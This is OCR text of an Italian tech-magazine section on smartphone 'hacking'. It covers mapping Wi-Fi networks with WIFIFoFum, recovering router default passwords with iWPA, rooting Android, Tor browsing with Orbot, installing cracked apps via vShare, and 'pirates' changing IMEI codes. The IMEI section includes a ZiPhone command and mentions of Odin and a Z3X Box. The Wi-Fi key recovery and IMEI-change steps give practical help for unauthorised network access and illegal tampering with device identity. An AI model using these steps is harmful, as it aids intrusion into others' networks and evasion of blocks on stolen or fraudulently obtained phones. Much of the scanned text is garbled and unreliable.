de con un consiglio inaspettato da un 
giocatore incallito del suo calibro: "Il 
giocod'azzardopuòcrcaredipenden- 
za, trasformandosi da un piacevole 
divertimento in una vera e propria 
patologia". Un ammonimento sacro¬ 
santo a non farsi prendere la mano e a 
usare ia ragione ogniqualvolta puntia¬ 
mo il nostro denaro, magari facendoci 
aiutare da un software come Totofor¬ 
tuna Scommesse che ci permetterà di 
divertirci senza oltrepassare i lìmiti. 










































Gratis su Internet 
con il cellulare 


Cosaci 

occorre 



SNIFFERÒ! RÉTE 

WIFIFOFUM 

Sito Internet- 

http://store.apple.com 


C'è chi "trucca" lo smartphone per agganciarsi alle reti Wi-Fi 
della propria città e navigare a costo zero 


I cellulari di ultima generazione si sono evoluti davvero tanto 
rispetto a modelli di qualche tempo fa, integrando tante fun¬ 
zionalità, molte delle quali vengono aggiunte grazie alle ap¬ 
plicazioni disponibili sui vari market. Può capitare, però, che al¬ 
cune di queste vengano bandite dagli store on-line, soprattutto 
da quello della Apple, perché non rispettano le regole di pubbli¬ 
cazione. In questi casi, gli utenti tìtiC'smaliziati" decidono allo¬ 
ra di rivolgersi a repository alter^M^ome Cydia, che permet¬ 
tono di installare anche queste appmiqli iPtujpe cosiddetti jail- 
broken, cioè sbloccati. 


Questa rete è aperta 

Una di queste app è WIFIFoFum, scaricabile attraverso la 
di BigBoss, che permette di creare una sorta di "mappa" delle 
Fi disponibili nella propria città. Ci stiamo chiedendo a cosa potrebbe 



servire un elenco completo di tutti i punti di accesso alle reti wireless 
disponibile nelle vicinanze? Innanzitutto, per verificare che sullo stes¬ 
so canale sul quale sta trasmettendo il nostro router non ci siano con¬ 
nessi troppi dispositivi, evitando cosi il fenomeno dell'interferenza. 
Ma può tornare utile anche ad un eventuale malintenzionato alla ri¬ 
cerca di quelle reti wireless "deboli" dal punto di vista della protezio¬ 
ne e in cui introdursi senza autorizzazione usando un'altra app come 
iWPA. In parole povere, per mettere in pratica la tecnica del wardri- 
ving. Tra le altre cose, l'applicazione permette di memorizzare i da¬ 
ti delle scansioni delle reti Wi-Fi all’interno di un file in formato KML, 
cioè quello delle mappe satellitari di Google Earth: in questo modo, 
malintenzionato può individuare geograficamente la posizione del 
p8hto d'accesso Wi-Fi! Nessuno, comunque, ci vieta di utilizzare WIFI- 
per testare la nostra rete e verificare quanto è vulnerabile ad 
hi esterni. Vediamo in che modo. 


Wiiitotum. 




q WiFiFoFum « 

da Boss (Utilities) 

W.Fi network scanner Report;ng foggiruj 
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11:46 m., giu 10. ‘12(17 APs) > 

11:31 m., giu 10/12 (75 APs) > 

10:21 p., giu 7,’12 (7 APs) > 




Inst alliamo l’app sull’iPhone 

Per scaricare l’applicazione dalla home 
dell’iPhone accediamo allo store on-line 
Cydia. Nella barra strumenti in basso tap¬ 
piamo Cerca e avviamo la ricerca dell’app WiFiFoFum 
Selezioniamola nell'elenco dei risultati e. nella pa¬ 
gina successiva, premiamo il tasto Installa 


Siamo subito operativi 

L'installazione verrà completata in pochi 
secondi. Al termine, attiviamo il servizio di 
localizzazione dell’iPhone accedendo alle 
sue Impostazioni e spuntando la relativa voce. Solo 
adesso possiamo avviare l’app tappando sull'icona 
presente nella home dello smartphone. 


Una scansione dell’etere 

Per iniziare la raccolta dati, spostiamoci 
nel tab Logginge spuntiamo l'omonima 
voce in alto. Nella sezione Logs, in basso, 
verranno elencati i dati raccolti in base all'ora di 
scansione e al numero di punti d'accesso indivi¬ 
duati. Tali dati saranno disponibili anche off-line 
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Nearby 



Ecco tutte le reti Wi-Fi 

0 In Networks sarà possibile vedere le reti 
Wi-Fi presenti nelle vicinanze, con i rela¬ 
tivi dati relativi alla sicurezza e al canale 
di trasmissione. Inoltre, sarà possibile annotare 
altre informazioni quali il Mac Address del router, 
utile in caso rii attacchi alla rete senza fili. 






Infor mazioni da analizzare 


B Tappiamo sul file KML per caricare Google 
Earth. Verranno mostrati tutti i punti di 
accesso presenti nella zona scansionata 
con WIFIFoFum, tra cui anche quello relativo al 
nostro router. Tappandoci sopra, scopriremo le in¬ 
formazioni relative alla nostra rete senza fili. 


Una m appa dettagliata 

B Grazie al servizio di localizzazione potremo 
vedere in tempo reale la posizione dei pun¬ 
ti d'accesso presenti nelle nostre vicinan¬ 
ze indicati nella sezione NearBy. Selezionando un 
punto d’accesso, potremmo trovare le indicazioni 
per raggiungerlo sfruttando le Mappe di Google. 



Fastweb 


Il grimald ello d elle reti 


B Per cercare di scardinare le password di 
accesso al nostro AccessPomt, scarichia¬ 
mo dall'App Stare l'applicazione tWPA, che 
costa 0.79 euro e installiamola. Avviamola, selezio¬ 
niamo il gestore telefonico e inseriamo il nome SSID 
della rete nell'apposito campo di testo. 


Espo rtiamo i dati raccolti 

Terminata la scansione delle reti Wi-Fi 
disponibili, possiamo inviarci via e-mail il 
file in formato KML contenente tutte le 
informazioni geografiche sui singoli punti di acces¬ 
so. Spostiamo in logging, tocchiamo r icona m alto 
a destra e selezioniamo la voce Email file. 







Alice-47§5r 


Dettaglio Router #1 


00:23:SÉ:u 


Pass: v4wh9dfbub66f" 





__t 

B L'app indicherà in Pass la password per 
entrare nella rete Wi-Fi! Purtroppo anche 
un malintenzionato potrebbe scoprirla 
seguendo la stessa procedura: in questi casi, oltre 
a cambiarla, è opportuno configurare opportuna¬ 
mente il firewall e attivare un filtro sugli indirizzUP 


RETI WI-FI SENZA ALCUNA INTERFERENZA 


L’applicazione WIFIFoFum può tornare molto utile anche per 
verificare che sul canale in cui trasmette il nostro router Wi-Fi 
non ci siano troppi apparecchi che già occupano la banda di¬ 
sponibile. Per scoprirlo, apriamo la sezione Networks, in basso 
a sinistra, e tappiamo sulla voce Channel. Dalla schermata che 
appare annotiamoci il numero identificativo posto accantoal nome 
della nostra rete: questo codice ci permette di sapere su quale 
canale sta trasmettendo il nostro router. Adesso, nella colonna 
Channel, verifichiamo che non ci siano più di due apparecchi 
che trasmettono contemporaneamente sul medesimo canale. In 
caso affermativo, è opportuno cercare un canale meno "trafficato’’ 
cosi da evitare ogni possibile interferenza e riuscire a sfruttare al 
meglio tutta la banda di trasmissione disponibile. Per cambiare 
il canale di trasmissione, accediamo alla pagina di controllo del 


nostro Access Point digitando il suo indirizzo IP (tipicamente è 
192.168.1.1) nella barra indirizzi del browser. Nella pagina Web 
che appare spostiamoci nella sezione Wireless (o qualcosa di 
simile, le voci possono cambiare a seconda del modello utilizzato) 
e modifichiamo il valore del campo Canale dal corrispondente 
menu a tendina. Eventualmente, ripetiamo il test di verifica con 
WIFIFoFum per valutarne l'eventuale congestione. 




ALLA SCOPERTA DI 
BACKTRACK: L'OS 
DEGLI HACKER 

Un libro dedicato all'OS 
più usato da chi si occupa 
di sicurezza delle reti, 
ma anche da chi vuole 
'bucarle''. 

QUANTOCOSTA: 

Gratuito solo per i lettori di 
Win Magazine. Lo trovi in 
formato POF sul Web DVD 

AUTORE: 

Giacomo Bellazzi 
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Root del cellulare 
basta un clic! 

Vuoi sbloccare lo smartphone Android ma non sai come 
fare? Con le nostre dritte puoi riuscirci in pochi secondi! 


Cosa ci f J 
occorre 


TELEFONINO ANOROtD 

LG OPTIMUS ONE 

Qua liti) co'- :.i €179» 
Silo Interne): 

www.lg.com 


UNLOCK ROOT 2.31 

Duanio cosin Gratuito 
Sito liitormit. 

www.unlockroot.com 


L e applicazioni disponibili sul PlayStore 
di Google sono ormai diverse migliaia 
ma. per motivi di autorizzazioni, non 
tutte possono essere installate sul nostro 
telefonino. Per quelle più appetitose e, di 
solito, preferite dai pirati, è necessario che 



* 


jl software fondamentale per il rooting dello smart p hon e 

Dal nostro PC, avviamo il browser che preferiamo (ad esempio Inter¬ 
net Explorer) e raggiungiamo il sito Web www.unlockroot.com. Cic¬ 
chiamo quindi sul pulsante Download per scaricare il file unlockroot23. 
exe(o di una versione più recente, se disponibile). 


potrebbe far decadere la garanzia offerta 
dal produttore. Se abbiamo voglia di ab¬ 
battere i limiti del nostro smartphone ac¬ 
cettando questo piccolo compromesso, 
rimbocchiamoci le maniche e scopriamo 
subito come procedere. 



Attiv iamo sempre la giusta opzione 


Prendiamo il nostro telefonino Android e spostiamoci nel menu 
Impostazioni. Da qui, tappiamo sulla voce Applicazioni e accediamo 
a Sviluppo non ci resta che attivare l’opzione Debug USB e tornare 
alla schermata principale di Android. 


sullo smartphone siano attivi i permessi di 
amministrazione ovvero, in gergo tecnico, 
che il telefonino sia "rootato" (in ambiente 
Linux, da cui Android deriva, root è proprio 
l'utente amministratore). La procedura di 
sblocco non è per nulla illegale, anche se 






I driver devono essere sempre aggiornati 


B Prima di collegare il telefono al PC tramite cavo USB, scarichiamo i 
driver più recenti relativi al modello in nostro possesso (per l'LG 
Optimus One. li troviamo sul sito www.winmagazine.it/link/i584). 
Installiamo il software sul PC e solo dopo colleghiamo lo smartphone via USB. 


Insta llazione in corso: al 


IWIUHfH 


fingo! 


B Effettuiamo un doppio clic sul file unlockroot23.exe (scaricato al 
Passo 1) e avviamo l'installazione del software. Durante la procedu¬ 
ra guidata, cucchiamo sempre sul pulsante Nexte terminiamo con 
Finish verificando che la voce RunUnLook Root 2.31 sia attivata, 
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Trucca lo smartphone 


PC e Smartphone degli Hacker 



La procedura è stataawiata 

H Appare quindi l'interfaccia principale di UnLock Root: da 
qui è possibile testare le performance del nostro telefo¬ 
nino o visualizzare la lista dei modelli compatibili cuc¬ 
cando su Supporl Devices List. Avviamo la procedura di sblocco 
con un clic sul pulsante Root. 



Sceg liamo il nostro telef onino 

B Nella finestra Choose a Connected Device che appare a t 
schermo, clicchiamo sul modello in nostro possesso già 
collegato al PC (nel caso In figura L6ELG-P500) e atten¬ 
diamo qualche secondo affinché UnLock Root installi sulla mem- 
moria dello smartphone tutto il necessario. 



QUANDO SERVE 
LA GARANZIA 


Come già detto, lo pro¬ 
cedura di sblocco di uno 
smartphone Android 
potrebbe invalidarne 
la garanzia. Nel caso in 
cui dovessimo rivolgerci 
all’assistenza tecnica 
ufficiale del nostro 


telefonino, possiamo 
comunque riattivare il 
blocco. Dopo aver avvia¬ 
to Unlock Root, dicchia- 
mo sul pulsante Unroot. 
Dopo pochi secondi, lo 
smartphone ritornerà 
alle sue impostazioni di 
fabbrica. 




La batteri a dura di più! 

Ci viene ora chiesto se vogliamo procedere all'installa¬ 
zione dell’app PowerSaverc.Ue ci consente di aumenta¬ 
re l'autonomia della nostra batteria Se vogliamo proce¬ 
dere al download gratuito, tappiamo su Si. altrimenti premiamo 
semplicemente No 


VrkxkRcùteon) 


Miofttut» Ima* 3à«te>-v ',*««• SP(MA« 


Il riawio è necessario 

Lo sblocco del telefonino dura sololJlWche secondo: il 
testo posto in basso a sinistra dell'interfaccia grafica di 
UnLock Root ci informa sullo stato del processo Al ter 
mine, per completare la procedura, è necessario procedere al 
riawio dello smartphone. 



nu» 


Applicazioni 

BusyBox 

j STEPHEN (STERICSON} 



LE ALTERNATIVE 
PER IL ROOT 


La lista dei telefonini 
compatibili con Unlock 
Root è veramente nutri¬ 
ta (wum.winmagazine. 
it/link/1609). Ma se 
il modello in nostro 
possesso non è fra quelli 
presenti nell’elenco, 
non c’è da disperare, 
poiché le alternative 
di certo non mancano. 
Facendo, infatti, un 
salto alla pagina Web 
www.winmagazine. 
it/link/1585 possiamo 
scaricare l’app gratuita 
Z4 Root. Dopo averla 
trasferita sul nostro 
telefonino,d basta 
avviarla e tappare su' 
pulsante Pemanent 
Root-, in pochi secondi 
lo smartphone verrà 
sbloccato! 


Facc iam o la p rova del nov e 

Dal nostro smartphone Android accediamo al Menu 
principale: nell’elenco delle app installate è presente la 
nuova voce Superuser. questa è la prova che tutto è 
andato per il verso giusto. Prima di iniziare a installare qualsiasi 
app, mettiamo la ciliegina sulla torta! 



■imi.hi.: 


» tutto funzioni 

Ora che il nostro telefonino è stato finalmente sblocca¬ 
to, facciamo un salto sul Play Storne da qui ricerchiamo 
l app gratuita BusyBox. Tappiamo dapprima su Scarica 
e successivamente su Accetta e scarica, solo ora il nostro telefo¬ 
nino è pronto per awiare qualsiasi software! 
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Così sblocco 
il mio cellulare 

Confessioni da un pirata: ecco come modifico il codice IMEI per 
superare le limitazioni imposte dall'operatore telefonico 



I Phone, iPad e Samsung Galaxy Tab. So¬ 
no i gadget tecnologici di nuova gene¬ 
razione che affollano i sogni di tutti gli 
appassionati di elettronica e di informa¬ 
tica più in generale. Che sia uno smart¬ 
phone o un tablet, tutti vorremmo por¬ 
tarci a casa uno dei più evoluti "suoielli" 
del momento, ma purtroppo i loro 
zi non poi cosi bassi fanno sì ch^r^jffhfi. 
solo un lusso di pochi. Spulciando in gi& 
per il Web alla ricerca di un metodo che 
ci consentisse di acquistare uno di que¬ 
sti gioiellini a prezzi più convenienti del 
solito, ci siamo ritrovati di fronte a delle 
offerte che ci hanno incuriosito un po': 
abbiamo dunque deciso di scavare più 
a fondo ed ecco cosa abbiamo scoperto. 


DIMMI L'IMEI E TI DIRÒ CHE TELEFONO SEI! 

Non è detto, ovviamente, che tutti i telefomm piliamoll campo Enter IMEI number below con 
usati, magari disponìbili ad un prezzo bonv il codice IMEI associato al telefoninoche stiamo 
bà« siano necessariamente provenienti da un per acquistare. Confermiamo conurt clic sul pul- 
abbonamento telefonico non piu pagato o sante Analyse e attendlamoche la verifica venga 
che. peggio ancora, siano rubati. Al momento portata a termine. Se l'iMEI del telefonino risulta 
dell’acquisto, comunque, possiamo tutelarci regolare,appariràavideoiltesto VeryMfce/y.ln 
effettuando una piccola verifica del telefonino, caso contrario ci verrà consigliato di informare 
,r (tutto, dal tastierino numerico digitiamo le forze dell’ordine poiché ci ritroviamo di fronte 
*i * ,r e inotiamo il codice IMEI che viene mo- ad un telefonino potenzialmente rubato, 
sttatv. ,uldisr' • Stacchiamo poi la batteria del 
telefonino e et.. c* r c'-eii codice annotato 
in precedenza cc de jr a a -uello presente 
nel vano batteria deiio m? .pn-'ne; Se non è 
presente, sulla confezione .. 3' ci o r ,vo ara 
probabilmente riportato un adesivo ne «dir* 
i'IMEI ad esso assoc iato. Ma non finisce qu i «... 
qualsiasi PCconrtesso al Web. raggiungiamo,.« 
pagina / « .vinr.ìà ! • •;«• ; T>:;' éconrv 



CAMBIO IMEI SU IPHONE? 
AL PIRATA BASTA UN CLIC! 



L’iPhone resta uno degli smart¬ 
phone più apprezzati e deside¬ 
rati di sempre ma, considerato il 
suo prezzo non proprio alla por¬ 
tata di tutti, la maggior parte de¬ 
gli utenti decide di acquistarne 
uno in abbonamento o magari 
usato spulciando per bene tra 
le migliaia di annunci presenti 
sul Web. Ed eccoci dunque di 
fronte ad un altro caso che po¬ 
trebbe mettere in serio pericolo 
le nostre già provate finanze. 
Anche in questo caso, però, ad 
un eventuale pirata interessato 
ad entrare in possesso in ogni 
modo di un nuovo smartpho¬ 
ne o tablet a basso costo poco 


importa e dopo aver fiutato l'af¬ 
fare si accaparra il melafonino 
che ben presto potrebbe venir 
bloccato. Prima che ciò accada, 
però, il pirata scarica sul suo PC 
il software, ZiPhone. Di che cosa 
si tratta? Semplicemente di un 
programma che gli consente di 
cambiare il codice IMEI del suo 
nuovo iPhone in pochissimi clic. 
Dopo averlo avviato, infatti, col¬ 
lega l'iPhone (o anche l'iPad 3G) 
al PC premendo contemporane¬ 
amente il pulsante di accensione 
e il tasto centrale. Così facendo, 
il melafonino verrà messo in mo¬ 
dalità di ripristino (la conferma 
verrà data dalla presenza di 


un logo di iTunes sul display). 
A questo punto, se il pirata sta 
utilizzando Windows 7, si sposta 
sul menu Start e avvia il Prompt 
dei comandi (scrivendo cmd nel¬ 
la barra di ricerca e selezionando 
poi la relativa voce nell’elenco 
dei risultati). Nella schermata 
che appare digita Ziphone-u -I 
a seguito dal nuovo codice IMEI 
che vuole inserire, ad esempio 
123456789012345. Il pirata at¬ 
tende qualche secondo e, non 
appena l'iPhone verrà riavviato 
automaticamente, verifica che 
tutto sia andato come previsto 
e che lo smartphone funzioni 
ora senza alcun cambiamento. 
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Una nuova truffa! 



cambiare il codice IMEI del suo nuovo gin¬ 
gillo elettronico. Ovviamente infrangen¬ 
do la legge, ma almeno nella speranza di 
non perdere completamente l'investimen¬ 
to economico sostenuto per acquistarlo! 


I più importanti siti di annunci sono lette¬ 
ralmente tempestati di proposte di que¬ 
sto o di quel telefonino e alcune di que¬ 
ste mostrano dei prezzi che hanno davve¬ 
ro dell'incredibile. Per quale strano moti¬ 
vo un utente dovrebbe cedere il suo nuo¬ 
vissimo smartphone, perfettamente fun¬ 
zionante, ad un prezzo molto più basso 
rispetto alla media di mercato? Abbiamo 
contattato un po' di inserzionisti e, trala¬ 
sciando qualche classico truffatore alla 
ricerca di un pollo da spennare (propo¬ 
nendo poco sicuri trasferimenti di dena¬ 
ro), dietro a tutti gli altri annunci non sem¬ 
brava celarsi alcun inganno. Insospettiti 
ancor di più, abbiamo dunque consultato 
tutti i maggiori forum di telefonia mobi¬ 
le presenti on-line ed è proprio I) che ab¬ 
biamo trovato la risposta ai nostri que¬ 
siti: molti operatori mobile offrono i più 
evoluti smartphone a costo zero, a patto 
di stipulare un abbonamento che preve¬ 
de una somma di euro da pa^re men¬ 
silmente. C'è chi, dopo aver stallalo u i 
contratto con dati anagrafici fasuflfnmjp 
te in vendita questi telefoni on-line, 
cando di guadagnarci qualcosa. Conside¬ 
rati poi i prezzi decisamente bassi, riusci¬ 
re a piazzare lo smartphone o il tablet è 
questione di poche ore. 


Pirati contro pirati 

Ma cosa accade al povero acquirente? Do¬ 
po qualche settimana (ovvero, non appe¬ 
na c'è da pagare la prima rata dell'abbo¬ 
namento) si ritrova fra le mani un telefo¬ 
nino bloccato dall'operatore stesso: il tut¬ 
to grazie al codice IMEI, un numero iden¬ 
tificativo univoco associato a qualsiasi te¬ 
lefonino o tablet 3G del mondo che per¬ 
mette di individuarlo e, in caso, bloccarlo. 
A questo punto, il povero ingenuo caduto 


nella trappola del truffatore si ritrova per 
le mani un gadget magari anche nuovo di 
pacco, ma di fatto inutilizzabile. A meno 
che il truffato non si trasformi a sua volta 
in un pirata e, in pochi minuti, provveda a 


Come già detto, fra gli smart¬ 
phone più desiderati del mo¬ 
mento troviamo il Samsung 
Galaxy S3. cosi come l'S2 o il 
Note 2: Insomma, I gioiellìni 
della casa coreana sembra 
no destare motto successo 
e proprio per questo motivo 
quasi tutti gti operatori mo¬ 
bile Il offrono In comodato 
d'uso. Dunque, il rischio di 
accaparrarsene uno a prezzi 
stracciati on-line é ritrovarsi 
qualche mese dopo con un 
telefonino bloccato è abba 


stanza alto. Ma c'è chi riesce 
a cambiare velocemente il 
codice IMEI proprio su que ■ 
sti smartphone Samsung e 
per farlo è sufficiente un solo 
software. Stiamo parlando di 
Odin, il programma utilizzato 
dall'assistenza tecnica della 
casa coreana per risolvere le 
problematiche più disperate. 
Molti di noi sanno che Odin 
è ih grado di farci ottenere 
velocemente I permessi di 
root di un qualsiasi smart 
phone Samsung cambiando 


Odmj irà.!» 
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là ROM (in poche parole, il i 
sistema operativo) dei tele 
fonino stesso. Pochi, però, 
sono a conoscenza del fatto 
che Odin sia in grado anche 
di variare 11 codice IMEI del 
dispositivo ad esSo interfac - 
ciato. Dopo aver collegato 
lósrhartphone al PC tramite 
iì cavo USB fornito in dota 
zfonè, il pirata avvia Odin 
e, seguendo le giuste dritte 
trovate senza particolari dif¬ 
ficoltà sul Web, raggiunge in 
pochi minuti i! suo obiettivo. 
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Z3X BOX: LA "SCATOLETTA MAGICA" DEL PIRATA 


Fra le soluzioni hardware che 
permettono il cambio IMEI 
di molti dispositivi mobile 
troviamo la Z3X Box, una 
scatoletta dalle dimensioni 
di una manciata di centimetri 
che sta letteralmente facendo 
impazzire i pirati più esigenti. 
È bene sapere, però, che non 
tutti i telefonini più recenti 
sono compatibili con questo 
particolarissimo gingillo tec¬ 
nologico: chi decide di portar¬ 
sene a casa una, al momento 
dell'acquisto dovrà inoltre 


decidere per quale marchio 
abilitarla (per lo più Samsung 
o LG). Verrà fornita infatti una 
chiave di attivazione (il costo 
si aggira attorno ai 50 euro) 
da inserire nel software d’uso 
della Z3X Box che. dopo un 
rapido controllo on-line, abi¬ 
literà il riconoscimento dei 
telefonini. Il pirata collega 
dunque il cellulare alla Z3X 
Box utilizzando uno dei cavi 
forniti in dotazione e ritorna 
all'interfaccia grafica princi 
pale del software fornito a 


corredo con la "scatoletta" 
magica. Inserisce quindi il 
modello del telefonino col¬ 
legato e, seguendo la pro¬ 
cedura guidata, provvede 
alla modifica del codice IMEI 
del telefonino. Questa so¬ 
luzione hardware, al pirata 
può costare diverse decine di 
euro (oltre che, ovviamente, 
seri problemi legali). In ogni 
caso, maggiori informazioni 
sulla Z3X Box sono dispo¬ 
nibili all'indirizzo www.z3x 
team.com. 
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Lo scaricatutto 
per iPhone 

Grazie ad un nuovo tool gli smanettoni si procurano gratis 
le applicazioni a pagamento dell'App Store. Ecco come! 


Cosaci 

occorre 

AW PtH DlSI'OSITIVl I0S 

VSHARE 

Gratuito 

Sito Internet 

www.appw.com 



I pirati di iOS che hanno effettuato il jailbreak dei loro iDe- 
vice riescono a procurarsi a scrocco tutte le applicazioni 
dell'App Store. Per farlo usano vShare, una nuova app svi¬ 
luppata in Estremo Oriente che si installa tramite una pagi¬ 
na Web e consente di scaricare liberamente le applicazioni 
craccate. In Europa l'utilizzo di vShare era limitato dal fatto 
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Una falla nel browser S afari 

Ciò che rende possibile l’installazione di vShare è una 
falla di Safari Recandosi sul sito www.appw.com alcu¬ 
ni script lavorano per aprire le porte di comunicazione e 
avere accesso al device. Il tasto in alto al centro è quello che 
permette agli smanettoni di installare vShare. 

t 


a 






C ' off ' 



che l'unica lingua utilizzata nello store era il cinese, ma al¬ 
cuni sviluppatori lo hanno localizzato in vari idiomi, tra cui 
l'italiano. vShare è l'app prediletta degli smanettoni perché 
consente loro di aggiornare qualsiasi app, sia quelle scarica¬ 
te illegalmente sia quelle già presenti nel melafonino e re¬ 
golarmente acquistate. Ecco tutti i retroscena! 


aoi.appvv.com desidera 
installare “vsharel.0.49(Need 
to Jailbreak)” 


Annulla 


Insella 




vSh are adesso è sull’iDevice 

Una volta tappato si presenta una nuova pagina che 
permette di scaricare l’app. Dopo aver cliccato su Down¬ 
load , un messaggio awerte che la pagina Web desidera 
installare vShare e segnala che per completare l’installazione 
bisogna avere eseguito il jailbreak. 




talking torri cat 
talking tom cat 2 for ipad 
talking tom cat 2 

a- n.;- m . -—j. x;-1 


La li ngua è fondamentale 

B Tramite l’ultima icona di vShare, dai caratteri incompren- 
sibili, nella barra inferiore si accede a un nuovo menu, 
dal quale gli smanettoni riescono a distinguere l’icona 
delle impostazioni (il classico ingranaggio) e il menu dedicato al 
linguaggio, che consente loro di impostare la lingua inglese. 


Com e i pirati usano vShare 

Grazie all’icona a forma di lente di ingrandimento in 
alto a destra, gli smanettoni hanno accesso al campo di 
ricerca delle app craccate. In alternativa possono sfo¬ 
gliare le categorie a caccia di applicazioni interessanti e consi¬ 
gliate dagli utenti, proprio come sull’App Store. 


Q 


VSHARE PARLA 
ITALIANO! 

Uno sviluppatore indi- 
pendente si è prestato 
ai giochi degli sma¬ 
nettoni e ha rilasciato 
un tweak (vShare For 
You), presente in Cydio, 
che ha il compito di 
tradurre vShare in 
italiano, rendendo 
cosi più confortevole la 
navigazione e la ricerca 
delle app a chi ha loschi 
scopi. Il tweak, nono¬ 
stante possa essere 
visibile tramite Cydia, 
è rilasciato solo dietro 
donazionedii euro 
dopo aver preso contat¬ 
to con lo sviluppatore 
all'indirizzo dì posta 
elettronica vsharefor 
you# gmail.com. 
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Alberto Seveso per Fotolia 




IO ARTISTI - 10 PAESI - 10 MESI - 10 PSD 

Fotolia ti invita a scoprire ogni mese una creazione 
PSD inedita di un artista digitale di fama internazionale 

Scmoii2 

Giovedì io ottobre scarica GRATIS per 24 ore, il PSD creativo multilivello sul tema «Ritratto di una perfetta 
sconosciuta» dell'artista italiano Alberto Seveso e guarda il video making of dell’opera digitale. 


Risorsa Creativa N°i in Europa 


<n> fotolia 


wwvv.fotolia.it/ten 
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Navigare anonimi 
con ir telefonino 


Cosa ci 
occorre 

APPPERLA NAVIGAZIONE 
ANONIMA SU ANOROtO 

ORBOT 

Sito Internet: 

https://play.google.com 


Quando ti colleghi ad Internet dal tuo smartphone, qualcuno 
potrebbe spiarti! Solo noi ti diciamo come difendere la tua privacy 


iqjStro srt 

m, 


fai 


R imanere anonimi quando si naviga dal 
proprio computer di casa è argomento 
più volte discusso e trattato. Ma, sem¬ 
pre più spesso, specialmente nei casi in cui 
siamo lontani da casa, controlliamo la po¬ 
sta elettronica o le ultime notizie in arrivo 
da Facebook direttamente dal neutro smar¬ 
tphone o tablet Android. 

Come difendere, dunque, il nos 
mato in questi particolari casi? A rispo 
re alle nostre esigenze ci pensa Orbot, l'app 
rigorosamente gratuita che si appoggia al¬ 
la rete Tor. 

Per essere chiari, si tratta di una tecnica che 
opera una sorta di "smistamento" del no¬ 
stro indirizzo IP, ossia del codice univoco 
che ci distingue nella Rete. In questo mo¬ 
do, non sarà possibile rintracciare il nostro 
IP da parte di chiunque voglia risalire ad es¬ 
so. Cos'altro aspettiamo, allora? Installiamo¬ 
la subito sul nostro telefonino! 


Applicazioni 


V itti ® 11:26 


Orbot: Tor on Android 

W THE TO ! Scarica 






fi 


Configura Ioriti cibori 
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Facciamo un satto 

sul Pl ay Sta re 


D La prima cosa da 
fare è quella di 
verificare che il 
nostro smartphone o tablet 
Android sia connesso ad 
Internet Dopo aver effet¬ 
tuato l’accesso alle reti 
mobile, possiamo accede 
re a\ Play Stare é Googlee 
da qui ricercare l'app gra¬ 
tuita Orbot. Una volta tro¬ 
vata la pagina di nostro 
interesse tappiamo sem¬ 
plicemente sul pulsante 
Scarica e confermiamo con 
Accetta pscarica In questo 
modo potremo effettuare 
direttamente il download 
e l'installazione dell'app. 


tt f Al 11:27 

W Permissions 



You can optionally grant Orbot 
’Superuser' access to enable 
advanced features, such as 
Transparent Proxying. 


Request Superuser Access 


If you do not want to do this, 
please make sure to use apps 
made to work with Orbot 

I understand and would like to 
continue without Superuser 


Permessi 

necessari 


B AI termine del¬ 
la procedura, 
che può varia¬ 
re in base al tipo di con¬ 
nessione utilizzata, av¬ 
viamo l'app per iniziare 
la configurazione guida¬ 
ta di Orbot. Tappiamo 
quindi sul pulsante Next 
e selezioniamo Request 
Superuser Access per 
abilitare i permessi di 
amministrazione, necs- 
sari per il corretto fun¬ 
zionamento dell'app 
stessa. Confermiamo 
quindi con Consenti e 
attendiamo qualche se¬ 
condo. All termine, pro¬ 
seguiamo quindi con 
Next 


.0 | V 4 il ili 

Transparent Proxying 


This allows your apps to 
automatically run through thè 
Tor network without any 
configuration. 

')Proxy Ali Apps Through Tor 

(Check this box il you h<ivc no idee 
what wC are talfcmg atout) 

/CTN 

.Select Individuai Apps for Tor 



Next 



Per tutti o soltanto 

per alcuni.. . 

A questo pun¬ 
to è finalmen¬ 
te arrivato il 
momento di decidere 
se attivare la navigazio¬ 
ne sicura e anonima su 
tutte le applicazioni in¬ 
stallate sul nostro tele¬ 
fonino (ovviamente 
capaci di connettersi ad 
Internet) o solo su alcu¬ 
ne. Se volessimo ope¬ 
rare solo su un certo 
numero di applicazioni, 
selezioniamo ad esem¬ 
pio Select Individuai 
Apps for Tore prose¬ 
guiamo con Next At¬ 
tendiamo ora che venga 
caricato l'elenco con 
tutte le app presenti. 
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Quali app sc egliere ? 

Una volta apparso l'elenco completo, scorriamo la lista 
delle app e selezioniamo quelle di nostro interesse (ad 
esempio Browser ed Email) . Terminiamo con un tap sul 
pulsante dose che ci riporterà nella schermata del Passo 3 
Terminiamo con Next. 



Orbot attivato 

Appare l'interfaccia principale di Orbot con un grosso « 
pulsante di accensione al centro, Teniamolo tappato 
fino a quando non appare un messaggio di conferma. 
Dopo pochi secondi, tutto è pronto per iniziare a navigare in 
maniera totalmente anonima. 





La nostra p rivacy è garantita 

Premiamo il pulsante Menu del telefonino e selezionia¬ 
mo l'opzione Check. Si apre quindi una finestra del 
browser: se appare il messaggio "Congratulations. Your 
browser is configured to use Tor”. tutto è andato per il verso 
giusto e possiamo iniziare subito a navigare. 



Fine della sessione 

B Possiamo verificare lo stato di Orbot tramite un'icona 
nella tray bar di Android: se c'è raffigurata una cipolla 
verde, vuol dire che tutto procede secondo i piani. Per 
terminarlo, invece, tappiamo sull'icona e successivamente tap¬ 


piamo sul pulsante centrale presente nell’interfaccia di Orbot. 




COME FUNZIONA 
LA RETE TOR 

In una normale comu 
lutazione Internet, il 


nostro PC (riconosciuto 
univocamente sul Web 
con un ben preciso 
indirizzo IP) scambia 
dati con un server (ad 
esempio un sito Web 
raggiunto o l'Internet 
Provider). Così facendo, 
quest’ultimo è in grado 
di conoscere il nostro IP, 
e di conseguenza riusci¬ 
re anche a localizzarci. 

È un po'come alzare 
la cornetta e fare una 
telefonata: la persona 
chiamata vedrà sul suo 
display il nostro nume¬ 
ro di telefono, la rete 
Tor,per proteggerei! 
nostro anonimato, non 
fa altro che accogliere 
la richiesta di contatto 
verso un qualsiasi sito 
Web smistandola pero 
prima a migliaia di 
computer di tutto il 
mondo. Cosi facendo, 
il server contattato, 
non sarà in grado di 
visualizzare il nostro 
indirizzo IP, masi per¬ 
derà fra i mille indirizzi 
presenti. 


PROTEZIONE OLTRE OGNI LIMITE 


Se vogliamo attivare la navigazione si¬ 
cura per tutte le applicazioni installate 
sul nostro telefonino, avviamo Orbot e 
premiamo il pulsante Menu del cellulare. 
Selezioniamo poi Settings e da qui ricer¬ 
chiamo l'opzione Tor Everything: non 
ci resta che attivarla. È possibile fare in 
modo che siano protetti anche i device 
che navigano attraverso il nostro smar¬ 
tphone. Se utilizziamo le funzionalità di 
tethering (per condividere la connessione 
